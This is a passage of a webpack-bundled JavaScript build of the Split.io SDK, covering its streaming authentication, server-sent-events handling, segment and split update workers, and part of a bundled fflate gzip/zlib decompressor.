 * @param {string[] | undefined} userKeys set of user Keys to track MY_SEGMENTS_CHANGES. It is undefined for Node.
 */


function GET(settings, userKeys) {
  var relativeUrl = '/v2/auth';

  if (userKeys) {
    // accounting the possibility that `userKeys` is undefined (in node)
    var queryParams = userKeys.map(userKeyToQueryParam).join('&');
    if (queryParams) // accounting the possibility that `userKeys` and thus `queryParams` are empty
      relativeUrl += '?' + queryParams;
  }

  return Object(__WEBPACK_IMPORTED_MODULE_0__request__["a" /* default */])(settings, relativeUrl);
}

/***/ }),
/* 2855 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = decodeJWTtoken;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__base64__ = __webpack_require__(701);

/**
 * Decode a JWT token
 */

function decodeJWTtoken(token) {
  var base64Url = token.split('.')[1];
  var base64 = base64Url.replace(/-/g, '+').replace(/_/g, '/'); // no need to check availability of `encodeURIComponent`, since it is a function highly supported in browsers, node and other platforms.

  var jsonPayload = decodeURIComponent(Object(__WEBPACK_IMPORTED_MODULE_0__base64__["a" /* decodeFromBase64 */])(base64).split('').map(function (c) {
    return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
  }).join(''));
  return JSON.parse(jsonPayload);
}

/***/ }),
/* 2856 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = checkPushRequirements;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__services_getEventSource_browser__ = __webpack_require__(1291);

/**
 * Check if the JS environment has the necessary features to run in PUSH mode,
 * i.e., EventSource, base64 encoder and decoder.
 *
 * @return {boolean} if push is supported
 */

function checkPushRequirements(logger) {
  var esReference = Object(__WEBPACK_IMPORTED_MODULE_0__services_getEventSource_browser__["a" /* default */])();

  if (!esReference) {
    logger.warn('EventSource API is not available. Falling back to polling mode.');
    return false;
  }

  if (typeof atob !== 'function' || typeof btoa !== 'function') {
    logger.warn('"atob" and "btoa" functions for Base64 encoding are not available. Falling back to polling mode.');
    return false;
  }

  return true;
}

/***/ }),
/* 2857 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return MySegmentUpdateWorker; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_backoff__ = __webpack_require__(702);

/**
 * MySegmentUpdateWorker class
 */

var MySegmentUpdateWorker = /*#__PURE__*/function () {
  /**
   *
   * @param {Object} mySegmentsStorage
   * @param {Object} mySegmentsProducer
   */
  function MySegmentUpdateWorker(mySegmentsStorage, mySegmentsProducer) {
    this.mySegmentsStorage = mySegmentsStorage;
    this.mySegmentsProducer = mySegmentsProducer;
    this.maxChangeNumber = 0; // keeps the maximum changeNumber among queued events

    this.segmentsData = undefined; // keeps the segmentsData (if included in notification payload) from the queued event with maximum changeNumber

    this.currentChangeNumber = -1; // @TODO: remove once `/mySegments` endpoint provides the changeNumber

    this.put = this.put.bind(this);
    this.__handleMySegmentUpdateCall = this.__handleMySegmentUpdateCall.bind(this);
    this.backoff = new __WEBPACK_IMPORTED_MODULE_0__utils_backoff__["a" /* default */](this.__handleMySegmentUpdateCall);
  } // Private method
  // Preconditions: this.mySegmentsProducer.isSynchronizingMySegments === false
  // @TODO update this block similar to SplitUpdateWorker, once `/mySegments` endpoint provides the changeNumber


  var _proto = MySegmentUpdateWorker.prototype;

  _proto.__handleMySegmentUpdateCall = function __handleMySegmentUpdateCall() {
    var _this = this;

    if (this.maxChangeNumber > this.currentChangeNumber) {
      this.handleNewEvent = false;
      var currentMaxChangeNumber = this.maxChangeNumber; // fetch mySegments revalidating data if cached

      this.mySegmentsProducer.synchronizeMySegments(this.segmentsData, true).then(function (result) {
        if (result !== false) // Unlike `Split\SegmentUpdateWorker`, we cannot use `mySegmentsStorage.getChangeNumber` since `/mySegments` endpoint doesn't provide this value.
          _this.currentChangeNumber = Math.max(_this.currentChangeNumber, currentMaxChangeNumber); // use `currentMaxChangeNumber`, in case that `this.maxChangeNumber` was updated during fetch.

        if (_this.handleNewEvent) {
          _this.__handleMySegmentUpdateCall();
        } else {
          _this.backoff.scheduleCall();
        }
      });
    }
  }
  /**
   * Invoked by NotificationProcessor on MY_SEGMENTS_UPDATE event
   *
   * @param {number} changeNumber change number of the MY_SEGMENTS_UPDATE notification
   * @param {string[] | { name: string, add: boolean } | undefined} segmentsData might be undefined
   */
  ;

  _proto.put = function put(changeNumber, segmentsData) {
    // @TODO uncomment next line once `/mySegments` endpoint provides the changeNumber
    // const currentChangeNumber = this.mySegmentsStorage.getChangeNumber();
    if (changeNumber <= this.currentChangeNumber || changeNumber <= this.maxChangeNumber) return;
    this.maxChangeNumber = changeNumber;
    this.handleNewEvent = true;
    this.backoff.reset();
    this.segmentsData = segmentsData;
    if (this.mySegmentsProducer.isSynchronizingMySegments()) return;

    this.__handleMySegmentUpdateCall();
  };

  return MySegmentUpdateWorker;
}();



/***/ }),
/* 2858 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SplitUpdateWorker; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_backoff__ = __webpack_require__(702);

/**
 * SplitUpdateWorker class
 */

var SplitUpdateWorker = /*#__PURE__*/function () {
  /**
   * @param {Object} splitStorage splits cache
   * @param {Object} splitProducer node producer or full browser producer
   * @param {Object} splitsEventEmitter
   */
  function SplitUpdateWorker(splitStorage, splitProducer, splitsEventEmitter) {
    this.splitStorage = splitStorage;
    this.splitProducer = splitProducer;
    this.maxChangeNumber = 0;
    this.splitsEventEmitter = splitsEventEmitter;
    this.put = this.put.bind(this);
    this.killSplit = this.killSplit.bind(this);
    this.__handleSplitUpdateCall = this.__handleSplitUpdateCall.bind(this);
    this.backoff = new __WEBPACK_IMPORTED_MODULE_0__utils_backoff__["a" /* default */](this.__handleSplitUpdateCall);
  } // Private method
  // Preconditions: this.splitProducer.isSynchronizingSplits === false


  var _proto = SplitUpdateWorker.prototype;

  _proto.__handleSplitUpdateCall = function __handleSplitUpdateCall() {
    var _this = this;

    if (this.maxChangeNumber > this.splitStorage.getChangeNumber()) {
      this.handleNewEvent = false; // fetch splits revalidating data if cached

      this.splitProducer.synchronizeSplits(true).then(function () {
        if (_this.handleNewEvent) {
          _this.__handleSplitUpdateCall();
        } else {
          // fetch new registered segments for server-side API. Not retrying on error
          if (_this.splitProducer.synchronizeSegment) _this.splitProducer.synchronizeSegment(undefined, false, true);

          _this.backoff.scheduleCall();
        }
      });
    }
  }
  /**
   * Invoked by NotificationProcessor on SPLIT_UPDATE event
   *
   * @param {number} changeNumber change number of the SPLIT_UPDATE notification
   */
  ;

  _proto.put = function put(changeNumber) {
    var currentChangeNumber = this.splitStorage.getChangeNumber();
    if (changeNumber <= currentChangeNumber || changeNumber <= this.maxChangeNumber) return;
    this.maxChangeNumber = changeNumber;
    this.handleNewEvent = true;
    this.backoff.reset();
    if (this.splitProducer.isSynchronizingSplits()) return;

    this.__handleSplitUpdateCall();
  }
  /**
   * Invoked by NotificationProcessor on SPLIT_KILL event
   *
   * @param {number} changeNumber change number of the SPLIT_UPDATE notification
   * @param {string} splitName name of split to kill
   * @param {string} defaultTreatment default treatment value
   */
  ;

  _proto.killSplit = function killSplit(changeNumber, splitName, defaultTreatment) {
    var _this2 = this;

    // @TODO handle retry due to errors in storage, once we allow the definition of custom async storages
    this.splitStorage.killLocally(splitName, defaultTreatment, changeNumber).then(function (updated) {
      // trigger an SDK_UPDATE if Split was killed locally
      if (updated) _this2.splitsEventEmitter.emit(_this2.splitsEventEmitter.SDK_SPLITS_ARRIVED, true); // queues the SplitChanges fetch (only if changeNumber is newer)

      _this2.put(changeNumber);
    });
  };

  return SplitUpdateWorker;
}();



/***/ }),
/* 2859 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SSEClient; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__services_getEventSource__ = __webpack_require__(1291);

var VERSION = '1.1';
var CONTROL_CHANNEL_REGEX = /^control_/;
/**
 * Build metadata headers for SSE connection.
 *
 * @param {Object} settings Validated settings.
 */

function buildSSEHeaders(settings) {
  var headers = {
    SplitSDKClientKey: settings.core.authorizationKey.slice(-4),
    SplitSDKVersion: settings.version
  }; // ip and hostname are false if IPAddressesEnabled is false

  var _settings$runtime = settings.runtime,
      ip = _settings$runtime.ip,
      hostname = _settings$runtime.hostname;
  if (ip) headers['SplitSDKMachineIP'] = ip;
  if (hostname) headers['SplitSDKMachineName'] = hostname;
  return headers;
}

var SSEClient = /*#__PURE__*/function () {
  /**
   * Returns a SSEClient instance, or undefined if EventSource is not available.
   * @param {Object} settings Validated SDK settings.
   * @param {boolean} useHeaders True for Node and false for Browser, used to send metadata as headers or query params respectively.
   */
  SSEClient.getInstance = function getInstance(settings, useHeaders) {
    var EventSource = Object(__WEBPACK_IMPORTED_MODULE_0__services_getEventSource__["a" /* default */])();
    if (EventSource) return new SSEClient(EventSource, settings, useHeaders);
  } // Instance properties:
  //  streamingUrl: string
  //  EventSource: EventSource constructor
  //  connection: EventSource | undefined
  //  handler: EventHandler for open, close, error and messages events
  ;

  function SSEClient(EventSource, settings, useHeaders) {
    this.EventSource = EventSource;
    this.streamingUrl = settings.url('/sse');
    this.useHeaders = useHeaders;
    this.headers = buildSSEHeaders(settings);
  }

  var _proto = SSEClient.prototype;

  _proto.setEventHandler = function setEventHandler(handler) {
    this.handler = handler;
  }
  /**
   * Open the connection with a given authToken
   *
   * @param {Object} authToken
   * @throws {TypeError} Will throw an error if `authToken` is undefined
   */
  ;

  _proto.open = function open(authToken) {
    this.close(); // it closes connection if previously opened

    var channelsQueryParam = Object.keys(authToken.channels).map(function (channel) {
      var params = CONTROL_CHANNEL_REGEX.test(channel) ? '[?occupancy=metrics.publishers]' : '';
      return encodeURIComponent(params + channel);
    }).join(',');
    var url = this.streamingUrl + "?channels=" + channelsQueryParam + "&accessToken=" + authToken.token + "&v=" + VERSION + "&heartbeats=true"; // same results using `&heartbeats=false`

    this.connection = new this.EventSource( // For Browser, SplitSDKClientKey and SplitSDKClientKey headers are passed as query params,
    // because native EventSource implementations for browser doesn't support headers.
    this.useHeaders ? url : url + ("&SplitSDKVersion=" + this.headers.SplitSDKVersion + "&SplitSDKClientKey=" + this.headers.SplitSDKClientKey), // For Node, metadata headers are passed because 'eventsource' package supports them.
    this.useHeaders ? {
      headers: this.headers
    } : undefined);

    if (this.handler) {
      // no need to check if SSEClient is used only by PushManager
      this.connection.onopen = this.handler.handleOpen;
      this.connection.onmessage = this.handler.handleMessage;
      this.connection.onerror = this.handler.handleError;
    }
  }
  /** Close connection  */
  ;

  _proto.close = function close() {
    if (this.connection) this.connection.close();
  };

  return SSEClient;
}();



/***/ }),
/* 2860 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = SSEHandlerFactory;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__NotificationParser__ = __webpack_require__(2861);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__NotificationKeeper__ = __webpack_require__(2862);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__constants__ = __webpack_require__(354);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_logger__ = __webpack_require__(9);




var log = Object(__WEBPACK_IMPORTED_MODULE_3__utils_logger__["b" /* default */])('splitio-sync:sse-handler');

function isRetryableError(error) {
  if (error.parsedData && error.parsedData.code) {
    var code = error.parsedData.code; // 401 errors due to invalid or expired token (e.g., if refresh token coudn't be executed)

    if (40140 <= code && code <= 40149) return true; // Others 4XX errors (e.g., bad request from the SDK)

    if (40000 <= code && code <= 49999) return false;
  } // network errors or 5XX HTTP errors


  return true;
}
/**
 * Factory for SSEHandler
 *
 * @param {Object} pushEmitter emitter for emitting events related to feedback-loop & update queues
 */


function SSEHandlerFactory(pushEmitter) {
  var notificationKeeper = Object(__WEBPACK_IMPORTED_MODULE_1__NotificationKeeper__["a" /* default */])(pushEmitter);
  return {
    handleOpen: function handleOpen() {
      notificationKeeper.handleOpen();
    },

    /* HTTP & Network errors */
    handleError: function handleError(error) {
      var errorWithParsedData = error;

      try {
        errorWithParsedData = Object(__WEBPACK_IMPORTED_MODULE_0__NotificationParser__["a" /* errorParser */])(error);
      } catch (err) {
        log.warn("Error parsing SSE error notification: " + err);
      }

      var errorMessage = errorWithParsedData.parsedData && errorWithParsedData.parsedData.message;
      log.error("Fail to connect to streaming" + (errorMessage ? ", with error message: \"" + errorMessage + "\"" : ''));

      if (isRetryableError(errorWithParsedData)) {
        pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_2__constants__["g" /* PUSH_RETRYABLE_ERROR */]);
      } else {
        pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_2__constants__["f" /* PUSH_NONRETRYABLE_ERROR */]);
      }
    },

    /* NotificationProcessor */
    handleMessage: function handleMessage(message) {
      var messageWithParsedData;

      try {
        messageWithParsedData = Object(__WEBPACK_IMPORTED_MODULE_0__NotificationParser__["b" /* messageParser */])(message);
      } catch (err) {
        log.warn("Error parsing new SSE message notification: " + err);
        return;
      }

      var _messageWithParsedDat = messageWithParsedData,
          parsedData = _messageWithParsedDat.parsedData,
          data = _messageWithParsedDat.data,
          channel = _messageWithParsedDat.channel,
          timestamp = _messageWithParsedDat.timestamp;
      log.debug("New SSE message received, with data: " + data + "."); // we only handle update events if streaming is up.

      if (!notificationKeeper.isStreamingUp() && [__WEBPACK_IMPORTED_MODULE_2__constants__["e" /* OCCUPANCY */], __WEBPACK_IMPORTED_MODULE_2__constants__["a" /* CONTROL */]].indexOf(parsedData.type) === -1) return;

      switch (parsedData.type) {
        /* update events */
        case __WEBPACK_IMPORTED_MODULE_2__constants__["m" /* SPLIT_UPDATE */]:
          pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_2__constants__["m" /* SPLIT_UPDATE */], parsedData.changeNumber);
          break;

        case __WEBPACK_IMPORTED_MODULE_2__constants__["k" /* SEGMENT_UPDATE */]:
          pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_2__constants__["k" /* SEGMENT_UPDATE */], parsedData.changeNumber, parsedData.segmentName);
          break;

        case __WEBPACK_IMPORTED_MODULE_2__constants__["c" /* MY_SEGMENTS_UPDATE */]:
          pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_2__constants__["c" /* MY_SEGMENTS_UPDATE */], parsedData, channel);
          break;

        case __WEBPACK_IMPORTED_MODULE_2__constants__["d" /* MY_SEGMENTS_UPDATE_V2 */]:
          pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_2__constants__["d" /* MY_SEGMENTS_UPDATE_V2 */], parsedData);
          break;

        case __WEBPACK_IMPORTED_MODULE_2__constants__["l" /* SPLIT_KILL */]:
          pushEmitter.emit(__WEBPACK_IMPORTED_MODULE_2__constants__["l" /* SPLIT_KILL */], parsedData.changeNumber, parsedData.splitName, parsedData.defaultTreatment);
          break;

        /* occupancy & control events, handled by NotificationManagerKeeper */

        case __WEBPACK_IMPORTED_MODULE_2__constants__["e" /* OCCUPANCY */]:
          notificationKeeper.handleOccupancyEvent(parsedData.metrics.publishers, channel, timestamp);
          break;

        case __WEBPACK_IMPORTED_MODULE_2__constants__["a" /* CONTROL */]:
          notificationKeeper.handleControlEvent(parsedData.controlType, channel, timestamp);
          break;

        default:
          break;
      }
    }
  };
}

/***/ }),
/* 2861 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = errorParser;
/* harmony export (immutable) */ __webpack_exports__["b"] = messageParser;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(354);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);


/**
 * Parses the `data` JSON string, if exists, of a given SSE error notifications.
 * HTTP errors handled by Ably (e.g., 400 due to invalid token, 401 due to expired token, 500) have the `data` property.
 * Other network and HTTP errors do not have this property.
 *
 * @param {Object} error
 * @throws {SyntaxError} if `error.data` is an invalid JSON string
 */

function errorParser(error) {
  if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["j" /* isString */])(error.data)) error.parsedData = JSON.parse(error.data); // cannot assign to read only property 'data'

  return error;
}
/**
 * Parses the `data` JSON string of a given SSE message notifications.
 * Also assigns the type OCCUPANCY, if it corresponds, so that all supported messages (e.g., SPLIT_UPDATE, CONTROL) have a type.
 *
 * @param {Object} message
 * @throws {SyntaxError} if `message.data` or `JSON.parse(message.data).data` are invalid JSON strings
 */

function messageParser(message) {
  var messageData = JSON.parse(message.data);
  messageData.parsedData = JSON.parse(messageData.data); // set the event type to OCCUPANCY, to handle all events uniformely

  if (messageData.name && messageData.name === '[meta]occupancy') messageData.parsedData.type = __WEBPACK_IMPORTED_MODULE_0__constants__["e" /* OCCUPANCY */];
  return messageData;
}

/***/ }),
/* 2862 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = notificationKeeperFactory;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(354);

var CONTROL_CHANNEL_REGEXS = [/control_pri$/, /control_sec$/];
function notificationKeeperFactory(feedbackLoopEmitter) {
  var channels = CONTROL_CHANNEL_REGEXS.map(function (regex) {
    return {
      regex: regex,
      hasPublishers: true,
      // keep track of publishers presence per channel, in order to compute `hasPublishers`. Init with true, to emit PUSH_SUBSYSTEM_UP if initial OCCUPANCY notifications have 0 publishers
      oTime: -1,
      // keep track of most recent occupancy notification timestamp per channel
      cTime: -1 // keep track of most recent control notification timestamp per channel

    };
  }); // false if the number of publishers is equal to 0 in all regions

  var hasPublishers = true; // false if last CONTROL event was STREAMING_PAUSED or STREAMING_DISABLED

  var hasResumed = true;

  function getHasPublishers() {
    // computes the value of `hasPublishers`
    return channels.some(function (c) {
      return c.hasPublishers;
    });
  }

  return {
    handleOpen: function handleOpen() {
      feedbackLoopEmitter.emit(__WEBPACK_IMPORTED_MODULE_0__constants__["i" /* PUSH_SUBSYSTEM_UP */]);
    },
    isStreamingUp: function isStreamingUp() {
      return hasResumed && hasPublishers;
    },
    handleOccupancyEvent: function handleOccupancyEvent(publishers, channel, timestamp) {
      for (var i = 0; i < channels.length; i++) {
        var c = channels[i];

        if (c.regex.test(channel)) {
          if (timestamp > c.oTime) {
            c.oTime = timestamp;
            c.hasPublishers = publishers !== 0;
            var hasPublishersNow = getHasPublishers();

            if (hasResumed) {
              if (!hasPublishersNow && hasPublishers) {
                feedbackLoopEmitter.emit(__WEBPACK_IMPORTED_MODULE_0__constants__["h" /* PUSH_SUBSYSTEM_DOWN */]);
              } else if (hasPublishersNow && !hasPublishers) {
                feedbackLoopEmitter.emit(__WEBPACK_IMPORTED_MODULE_0__constants__["i" /* PUSH_SUBSYSTEM_UP */]);
              } // nothing to do when hasResumed === false:
              // streaming is already down for `!hasPublishersNow`, and cannot be up for `hasPublishersNow`

            }

            hasPublishers = hasPublishersNow;
          }

          return;
        }
      }
    },
    handleControlEvent: function handleControlEvent(controlType, channel, timestamp) {
      /* STREAMING_RESET event is handled by PushManager directly since it doesn't require
       * tracking timestamp and state like OCCUPANCY or CONTROL. It also ignores previous
       * OCCUPANCY and CONTROL notifications, and whether PUSH_SUBSYSTEM_DOWN has been emitted or not */
      if (controlType === __WEBPACK_IMPORTED_MODULE_0__constants__["b" /* ControlTypes */].STREAMING_RESET) {
        feedbackLoopEmitter.emit(controlType);
        return;
      }

      for (var i = 0; i < channels.length; i++) {
        var c = channels[i];

        if (c.regex.test(channel)) {
          if (timestamp > c.cTime) {
            c.cTime = timestamp;

            if (controlType === __WEBPACK_IMPORTED_MODULE_0__constants__["b" /* ControlTypes */].STREAMING_DISABLED) {
              feedbackLoopEmitter.emit(__WEBPACK_IMPORTED_MODULE_0__constants__["f" /* PUSH_NONRETRYABLE_ERROR */]);
            } else if (hasPublishers) {
              if (controlType === __WEBPACK_IMPORTED_MODULE_0__constants__["b" /* ControlTypes */].STREAMING_PAUSED && hasResumed) {
                feedbackLoopEmitter.emit(__WEBPACK_IMPORTED_MODULE_0__constants__["h" /* PUSH_SUBSYSTEM_DOWN */]);
              } else if (controlType === __WEBPACK_IMPORTED_MODULE_0__constants__["b" /* ControlTypes */].STREAMING_RESUMED && !hasResumed) {
                feedbackLoopEmitter.emit(__WEBPACK_IMPORTED_MODULE_0__constants__["i" /* PUSH_SUBSYSTEM_UP */]);
              } // nothing to do when hasPublishers === false:
              // streaming is already down for `STREAMING_PAUSED`, and cannot be up for `STREAMING_RESUMED`

            }

            hasResumed = controlType === __WEBPACK_IMPORTED_MODULE_0__constants__["b" /* ControlTypes */].STREAMING_RESUMED;
          }

          return;
        }
      }
    }
  };
}

/***/ }),
/* 2863 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = hashUserKey;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__base64__ = __webpack_require__(701);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__engine_engine_murmur3_murmur3__ = __webpack_require__(699);


/**
 * Returns the hash of a given user key
 *
 * @throws {ReferenceError} if `btoa` function is not defined (for browser)
 */

function hashUserKey(userKey) {
  return Object(__WEBPACK_IMPORTED_MODULE_0__base64__["b" /* encodeToBase64 */])(__WEBPACK_IMPORTED_MODULE_1__engine_engine_murmur3_murmur3__["a" /* default */].hash(userKey, 0).toString());
}

/***/ }),
/* 2864 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["c"] = parseKeyList;
/* harmony export (immutable) */ __webpack_exports__["b"] = parseBitmap;
/* harmony export (immutable) */ __webpack_exports__["a"] = isInBitmap;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_decompress__ = __webpack_require__(2865);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_base64__ = __webpack_require__(701);


var GZIP = 1;
var ZLIB = 2;

function Uint8ArrayToString(myUint8Arr) {
  return String.fromCharCode.apply(null, myUint8Arr);
}

function StringToUint8Array(myString) {
  var charCodes = myString.split('').map(function (e) {
    return e.charCodeAt();
  });
  return new Uint8Array(charCodes);
}
/**
 * Decode and decompress 'data' with 'compression' algorithm
 *
 * @param {string} data
 * @param {number} compression 1 GZIP, 2 ZLIB
 * @returns {Uint8Array}
 * @throws if data string cannot be decoded, decompressed or the provided compression value is invalid (not 1 or 2)
 */


function decompress(data, compression) {
  var compressData = Object(__WEBPACK_IMPORTED_MODULE_1__utils_base64__["a" /* decodeFromBase64 */])(data);
  var binData = StringToUint8Array(compressData);
  if (typeof __WEBPACK_IMPORTED_MODULE_0__utils_decompress__["a" /* algorithms */] === 'string') throw new Error(__WEBPACK_IMPORTED_MODULE_0__utils_decompress__["a" /* algorithms */]);
  if (compression === GZIP) return __WEBPACK_IMPORTED_MODULE_0__utils_decompress__["a" /* algorithms */].gunzipSync(binData);
  if (compression === ZLIB) return __WEBPACK_IMPORTED_MODULE_0__utils_decompress__["a" /* algorithms */].unzlibSync(binData);
  throw new Error("Invalid compression algorithm #" + compression);
}
/**
 * Decode, decompress and parse the provided 'data' into a KeyList object
 *
 * @param {string} data
 * @param {number} compression
 * @returns {{a?: string[], r?: string[] }}
 * @throws if data string cannot be decoded, decompressed or parsed
 */


function parseKeyList(data, compression) {
  var binKeyList = decompress(data, compression);
  var strKeyList = Uint8ArrayToString(binKeyList); // replace numbers to strings, to avoid losing precision

  return JSON.parse(strKeyList.replace(/\d+/g, '"$&"'));
}
/**
 * Decode, decompress and parse the provided 'data' into a Bitmap object
 *
 * @param {string} data
 * @param {number} compression
 * @returns {Uint8Array}
 * @throws if data string cannot be decoded or decompressed
 */

function parseBitmap(data, compression) {
  return decompress(data, compression);
}
/**
 * Check if the 'bitmap' bit at 'hash64hex' position is 1
 *
 * @param {Uint8Array} bitmap
 * @param {string} hash64hex 16-chars string, representing a number in hexa
 * @returns {boolean}
 */

function isInBitmap(bitmap, hash64hex) {
  // using the lowest 32 bits as index, to avoid losing precision when converting to number
  var index = parseInt(hash64hex.slice(8), 16) % (bitmap.length * 8);
  var internal = Math.floor(index / 8);
  var offset = index % 8;
  return (bitmap[internal] & 1 << offset) > 0;
}

/***/ }),
/* 2865 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return algorithms; });
/*
Trimmed version of "fflate" library (https://www.npmjs.com/package/fflate/v/0.7.1)
used for GZIP/Zlib decompression in JavaScript, with the minimal modules used by the SDK.

MIT License

Copyright (c) 2020 Arjun Barrett

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/

/* eslint-disable */
var algorithms = function iifeDecompress() {
  // Handle runtimes without typed arrays
  if ([typeof Uint8Array, typeof Uint16Array, typeof Uint32Array].some(function (v) {
    return v != 'function';
  })) {
    return 'global Uint8Array object is not available for gzip/zlib decompression';
  } // DEFLATE is a complex format; to read this code, you should probably check the RFC first:
  // aliases for shorter compressed code (most minifers don't do this)


  var u8 = Uint8Array,
      u16 = Uint16Array,
      u32 = Uint32Array; // fixed length extra bits

  var fleb = new u8([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0,
  /* unused */
  0, 0,
  /* impossible */
  0]); // fixed distance extra bits
  // see fleb note

  var fdeb = new u8([0, 0, 0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12, 12, 13, 13,
  /* unused */
  0, 0]); // code length index map

  var clim = new u8([16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15]); // get base, reverse index map from extra bits

  var freb = function freb(eb, start) {
    var b = new u16(31);

    for (var i = 0; i < 31; ++i) {
      b[i] = start += 1 << eb[i - 1];
    } // numbers here are at max 18 bits


    var r = new u32(b[30]);

    for (var i = 1; i < 30; ++i) {
      for (var j = b[i]; j < b[i + 1]; ++j) {
        r[j] = j - b[i] << 5 | i;
      }
    }

    return [b, r];
  };

  var _a = freb(fleb, 2),
      fl = _a[0],
      revfl = _a[1]; // we can ignore the fact that the other numbers are wrong; they never happen anyway


  fl[28] = 258, revfl[258] = 28;

  var _b = freb(fdeb, 0),
      fd = _b[0]; // map of value to reverse (assuming 16 bits)


  var rev = new u16(32768);

  for (var i = 0; i < 32768; ++i) {
    // reverse table algorithm from SO
    var x = (i & 0xAAAA) >>> 1 | (i & 0x5555) << 1;
    x = (x & 0xCCCC) >>> 2 | (x & 0x3333) << 2;
    x = (x & 0xF0F0) >>> 4 | (x & 0x0F0F) << 4;
    rev[i] = ((x & 0xFF00) >>> 8 | (x & 0x00FF) << 8) >>> 1;
  } // create huffman tree from u8 "map": index -> code length for code index
  // mb (max bits) must be at most 15
  // TODO: optimize/split up?


  var hMap = function hMap(cd, mb, r) {
    var s = cd.length; // index

    var i = 0; // u16 "map": index -> # of codes with bit length = index

    var l = new u16(mb); // length of cd must be 288 (total # of codes)

    for (; i < s; ++i) {
      ++l[cd[i] - 1];
    } // u16 "map": index -> minimum code for bit length = index


    var le = new u16(mb);

    for (i = 0; i < mb; ++i) {
      le[i] = le[i - 1] + l[i - 1] << 1;
    }

    var co;

    if (r) {
      // u16 "map": index -> number of actual bits, symbol for code
      co = new u16(1 << mb); // bits to remove for reverser

      var rvb = 15 - mb;

      for (i = 0; i < s; ++i) {
        // ignore 0 lengths
        if (cd[i]) {
          // num encoding both symbol and bits read
          var sv = i << 4 | cd[i]; // free bits

          var r_1 = mb - cd[i]; // start value

          var v = le[cd[i] - 1]++ << r_1; // m is end value

          for (var m = v | (1 << r_1) - 1; v <= m; ++v) {
            // every 16 bit value starting with the code yields the same result
            co[rev[v] >>> rvb] = sv;
          }
        }
      }
    } else {
      co = new u16(s);

      for (i = 0; i < s; ++i) {
        if (cd[i]) {
          co[i] = rev[le[cd[i] - 1]++] >>> 15 - cd[i];
        }
      }
    }

    return co;
  }; // fixed length tree


  var flt = new u8(288);

  for (var i = 0; i < 144; ++i) {
    flt[i] = 8;
  }

  for (var i = 144; i < 256; ++i) {
    flt[i] = 9;
  }

  for (var i = 256; i < 280; ++i) {
    flt[i] = 7;
  }

  for (var i = 280; i < 288; ++i) {
    flt[i] = 8;
  } // fixed distance tree


